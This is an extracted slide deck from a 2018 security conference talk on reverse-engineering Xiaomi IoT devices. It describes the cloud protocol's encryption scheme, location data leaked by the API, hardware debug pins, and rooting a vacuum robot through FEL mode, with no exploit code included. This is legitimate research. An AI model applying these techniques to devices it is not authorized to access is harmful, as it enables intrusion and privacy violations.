Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and...
Transcript of Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and...
![Page 1: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/1.jpg)
Reversing IoT: Xiaomi
EcosystemGain cloud independence and
additional functionality by firmware modification (CC BY-NC-SA 4.0)
![Page 2: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/2.jpg)
2ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Outline
• Introduction
• Xiaomi Cloud
• Devices and Rooting
– Vacuum Cleaning Robot
– Smart Home Gateway/Lightbulbs/LED Strip
![Page 3: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/3.jpg)
3ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Outline
• Introduction
• Xiaomi Cloud
• Devices and Rooting
– Vacuum Cleaning Robot
– Smart Home Gateway/Lightbulbs/LED Strip
![Page 4: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/4.jpg)
4ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Why Xiaomi
“Xiaomi’s ‘Mi Ecosystem’ has 50 million connected devices” [1]
„[…] revenue from its smart hardware ecosystem exceeded 15 billion yuan” (1.9 billion €) [2]
Most important: The stuff is cheap
[1] https://techcrunch.com/2017/01/11/xiaomi-2016-to-2017/[2] https://www.reuters.com/article/us-xiaomi-outlook/chinas-xiaomi-targets-2017-sales-of-14-5-billion-after-2016-overhaul-idUSKBN14W0LZ
![Page 5: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/5.jpg)
5ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Costs
• Vacuum Cleaning Robot Gen1: ~ 260 €
• Vacuum Cleaning Robot Gen2: ~ 400 €
• Smart Home Gateway: ~25 €
• Sensors: ~5-14 €
• Wifi-Lightbulbs: ~6-12€
![Page 6: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/6.jpg)
6ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi News
• Oculus Rift cooperation with Facebook
![Page 7: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/7.jpg)
7ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi News
• Oculus Rift cooperation with Facebook
• Xiaomi buys Segway
![Page 8: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/8.jpg)
8ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
How we started
May 2017Mi Band 2Vacuum Robot Gen 1
June 2017Smart Home Gateway + Sensors
July 2017Yeelink Lightbulbs (Color+White)Yeelink LED Strip
![Page 9: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/9.jpg)
9ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
How we started
October 2017Yeelink DesklampPhilips Eyecare Desklamp
December 2017Yeelink/Philips Ceiling LightsPhilips Smart LED Lightbulb
January 2018Vacuum Robot Gen 2Yeelink Bedside Lamp
![Page 10: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/10.jpg)
10ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Why Vacuum Robots?
Source: Xiaomi advertisment
![Page 11: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/11.jpg)
11ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Why Vacuum Robots?
Source: Xiaomi advertisment
![Page 12: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/12.jpg)
12ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
THE XIAOMI CLOUD
![Page 13: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/13.jpg)
13ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Cloud
• Different Vendors, one ecosystem
– Same communication protocol
– Different technologies used
• „Public“ guidelines for implementation
– Implementation differs from manufacturer to manufacturer
– https://github.com/MiEcosystem/miio_open
– https://iot.mi.com/index.html
![Page 14: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/14.jpg)
14ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
WiFi
![Page 15: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/15.jpg)
15ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
![Page 16: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/16.jpg)
16ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
![Page 17: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/17.jpg)
17ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Device to Cloud Communication
• DeviceID
– Unique per device
• Keys
– Cloudkey (16 byte alpha-numeric)
• Is used for cloud communication (AES encryption)
• Static, is not changed by update or provisioning
– Token (16 byte alpha-numeric)
• Is used for app communication (AES encryption)
• Dynamic, is generated at provisioning (connecting to new WiFi)
![Page 18: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/18.jpg)
18ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Cloud protocol
• Same payload for UDP and TCP stream
• Encryption key depending of Cloud/App usage
• For unprovisioned devices:– During discovery: Token in plaintext in the checksum field
Byte 0,1 Byte 2,3 Byte 4,5,6,7 Byte 8,9,A,B Byte C,D,E,F
Header Magic:2131 Lenght 00 00 00 00 DID epoch (big endian)
Checksum Md5sum[Header + Key(Cloud)/Token(App) + Data(if exists)]
Data Encrypted Data (if exists, e.g. if not Ping/Pong or Hello message)• token = for cloud: key; for app: token• key = md5sum(token)• iv = md5sum(key+token)• cipher = AES(key, AES.MODE_CBC, iv, padded plaintext)
![Page 19: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/19.jpg)
19ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Cloud protocol
• Data– JSON-formated messages– Packet identified by packetid– Structures:
• commands: "methods" + "params"• responses : "results"
– Every command/response confirmed by receiver (except otc)• Example
– {'id': 136163637, 'params': {'ap': {'ssid’: ‘myWifi', 'bssid': 'F8:1A:67:CC:BB:AA', 'rssi': -30}, 'hw_ver': 'Linux', 'life': 82614, 'model': 'rockrobo.vacuum.v1', 'netif': {'localIp': '192.168.1.205', 'gw': '192.168.1.1', 'mask': '255.255.255.0'}, 'fw_ver': '3.3.9_003077', 'mac': '34:CE:00:AA:BB:DD', 'token': 'xxx'}, 'partner_id': '', 'method': '_otc.info'}
![Page 20: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/20.jpg)
20ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
WiFi
![Page 21: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/21.jpg)
21ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
WiFi
![Page 22: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/22.jpg)
22ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
App to Cloud communication
• Authentication via OAuth
• Layered encryption
– Outside: HTTPs
– Inside: RC4/AES using a session key
• Separate integrity
• Message format: JSON RPC
![Page 23: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/23.jpg)
23ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
App to Cloud communication
• REQ: api.io.mi.com/home/device_list method:POST params:[]
• RES: {"message":"ok","result":{"list":[{"did":"65981234","token":“abc…zzz","name":"Mi PlugMini","localip":"192.168.99.123", "mac":"34:CE:00:AA:BB:CC","ssid":"IoT","bssid":"FA:1A:67:CC:DD:EE","model":"chuangmi.plug.m1", "longitude":“-71.0872248","latitude":"42.33794500“, "adminFlag":1,"shareFlag":0,"permitLevel":16,"isOnline":true,"desc":"Power plug on ","rssi":-47}
![Page 24: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/24.jpg)
24ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
App to Cloud communication
• REQ: api.io.mi.com/home/device_list method:POST params:[]
• RES: {"message":"ok","result":{"list":[{"did":"65981234","token":“abc…zzz","name":"Mi PlugMini","localip":"192.168.99.123", "mac":"34:CE:00:AA:BB:CC","ssid":"IoT","bssid":"FA:1A:67:CC:DD:EE","model":"chuangmi.plug.m1", "longitude":“-71.0872248","latitude":"42.33794500“, "adminFlag":1,"shareFlag":0,"permitLevel":16,"isOnline":true,"desc":"Power plug on ","rssi":-47}
![Page 25: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/25.jpg)
25ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
App to Cloud communication
• "longitude":"-71.0872248","latitude":"42.33794500”
Source: Openstreetmaps
![Page 26: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/26.jpg)
26ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
LETS TAKE A LOOK AT THE PRODUCTS
![Page 27: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/27.jpg)
27ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Products
Different architectures
• ARM Cortex-A
• ARM Cortex-M
– Marvell 88MW30X (integrated WiFi)
– Mediatek MT7687N (integrated WiFi + BT-LE)
• MIPS
• Xtensa
– ESP8266, ESP32 (integrated WiFi)
![Page 28: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/28.jpg)
28ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Operation Systems
• Ubuntu 14.04
– Vaccum cleaning robots
• Embedded Linux
– IP cameras
• RTOS
– Smart Home products
– Lightbulbs, ceiling lights, light strips
![Page 29: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/29.jpg)
29ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Implementations
Vacuum Robot Smart Home Gateway Philips Ceiling Light
Manufacturer Rockrobo Lumi United Yeelight
MCU Allwinner + STM + TI Marvell (WiFi) Mediatek (WiFi + BLE)
Firmware Update Encrypted + HTTPS Not Encrypted Not Encrypted + HTTPS (No Cert!)
Debug Interfaces Protected Available Available
![Page 30: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/30.jpg)
30ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Implementations
Vacuum Robot Smart Home Gateway Philips Ceiling Light
Manufacturer Rockrobo Lumi United Yeelight
MCU Allwinner + STM + TI Marvell (WiFi) Mediatek (WiFi + BLE)
Firmware Update Encrypted + HTTPS Not Encrypted Not Encrypted + HTTPS (No Cert!)
Debug Interfaces Protected Available Available
Bonus: Chinese device, but unknown communication to Server in Salt Lake City, USA
![Page 31: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/31.jpg)
31ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
LETS GET ACCESS TO THE DEVICES
![Page 32: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/32.jpg)
32ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
VACUUM CLEANING ROBOTS
![Page 33: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/33.jpg)
33ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Device Overview
Source: Xiaomi advertisment
![Page 34: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/34.jpg)
34ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Overview sensors
• 2D LIDAR SLAM (5*360°/s)
• Gen1 only: Ultrasonic distance sensor
• multiple IR sensors
• 3-axis Magnetic Sensor
• 3-axis accelerometer
• 3-axis gyroscope
• Bump sensors
![Page 35: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/35.jpg)
35ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Rooting: Challenges
• Hardware-based access
– Micro USB Port ?
– Serial Connection on PCB ?
• Network-based access
– Portscan ?
– Sniff Network traffic ?
![Page 36: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/36.jpg)
36ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Teardown
![Page 37: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/37.jpg)
37ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Frontside layout mainboard
512 MB RAM
R16SOC
4GBeMMCFlash
WiFi Module
STM32 MCU
![Page 38: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/38.jpg)
38ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Backside layout mainboard
R16 UART(115200 baud)TxRx
STM UART (921600 baud)
Tx
LIDAR UART
![Page 39: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/39.jpg)
39ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Frontside layout mainboard (GEN2)
512 MB RAM
R16SOC
4GBeMMCFlash
WiFi Module
STM32MCU
![Page 40: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/40.jpg)
40ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Rooting
• Usual (possibly destructive) way to retrieve the firmware
![Page 41: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/41.jpg)
41ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Rooting
• Usual (possibly destructive) way to retrieve the firmware
![Page 42: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/42.jpg)
42ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Rooting
Our weapon of choice:
![Page 43: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/43.jpg)
43ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Pin Layout CPU1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
A
MMC
Reset D6 D4 D2 D0 D2 D0 CLK TX UART1
B D7 D5 D3 D1 D3 D1 CMD RX
C CLK SDA TWI1
D RX TX CMD SCL
E
F
Recov
ery
Confir
m UART2
G RX TX
H
Line
IN L
J
LINE
IN R
K
PHO
NE IN
L
PHO
NE IN
M
PHO
NE
MIC1
P
N
PHO
NE
MIC2
P
P SDA SCK RESET RSB0
R
T LCD9 LCD7 LCD5 LCD3 LCD1USB-
DM0
USB-
DP0 USB 1
U LCD8 LCD6 LCD4 LCD2 LCD0USB
DRV
USB-
DM1
USB-
DP1 USB 2
DRAM VCC/VDD GND LCD
UART0 MMC2 MMC1
![Page 44: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/44.jpg)
44ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Rooting
Initial Idea:
• Shortcut the MMC data lines
• SoC falls back to FEL mode
• Load + Execute tool in RAM
– Via USB connector
– Dump MMC flash
– Modify image
– Rewrite image to flash
![Page 45: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/45.jpg)
45ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Software
• Ubuntu 14.04.3 LTS (Kernel 3.4.xxx)
– Mostly untouched, patched on a regular base
• Player 3.10-svn
– Open-Source Cross-platform robot device interface & server
• Proprietary software (/opt/rockrobo)
– AppProxy
– RoboController
– Miio_Client
– Custom adbd-version
• iptables firewall enabled
– Blocks Port 22 (SSHd) + Port 6665 (player)
![Page 46: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/46.jpg)
46ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Available data on device
• Data– Logfiles (syslogs, duration, area, ssid, passwd)– “/usr/sbin/tcpdump -i any -s 0 -c 2000 –w”– Maps– Multiple MBytes/day
• Data is uploaded to cloud• Factory reset
– Restores recovery to system– Does not delete data
• Maps, Logs still exist
![Page 47: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/47.jpg)
47ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Available data on device
• Maps
– Created by player
– 1024px * 1024px
– 1px = 5cm
![Page 48: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/48.jpg)
48ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Available data on device
Northeastern University, ISEC Building, 6th floor
![Page 49: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/49.jpg)
49ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
Communication relations
Miio_client
0.0.0.0:54321 (udp)(local):54322 (tcp)
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
*.fds.api.xiaomi.com (https)maps,logs->
<-soundpackages, firmwareuart_mcuuart_ldscompass
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
<-commands,reports->
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
AES encrypted
![Page 50: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/50.jpg)
50ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
eMMC LayoutLabel Content Size in MByte
boot-res bitmaps & some wav files 8
env uboot cmd line 16
app device.conf (DID, key, MAC), adb.conf, vinda 16
recovery fallback copy of OS 512
system_a copy of OS (active by default) 512
system_b copy of OS (passive by default) 512
Download temporary unpacked OS update 528
reserve config + calibration files, blackbox.db 16
UDISK/Data logs, maps, pcap files ~1900
![Page 51: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/51.jpg)
51ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
eMMC LayoutLabel Content Size in MByte
boot-res bitmaps & some wav files 8
env uboot cmd line 16
app device.conf (DID, key, MAC), adb.conf, vinda 16
recovery fallback copy of OS 512
system_a copy of OS (active by default) 512
system_b copy of OS (passive by default) 512
Download temporary unpacked OS update 528
reserve config + calibration files, blackbox.db 16
UDISK/Data logs, maps, pcap files ~1900
![Page 52: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/52.jpg)
52ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
![Page 53: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/53.jpg)
53ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
miIO.ota {"mode":"normal“, "install":"1", "app_url":"https://[URL]/v11_[version].pkg", "file_md5":“[md5]",”proc":"dnld install“}
![Page 54: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/54.jpg)
54ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
![Page 55: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/55.jpg)
55ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
2. Download [app_url]
system_a
system_b
Download
Data
Activecopy
![Page 56: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/56.jpg)
56ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update process
2. Download [app_url]
system_a
system_b
Download
Data
Activecopy
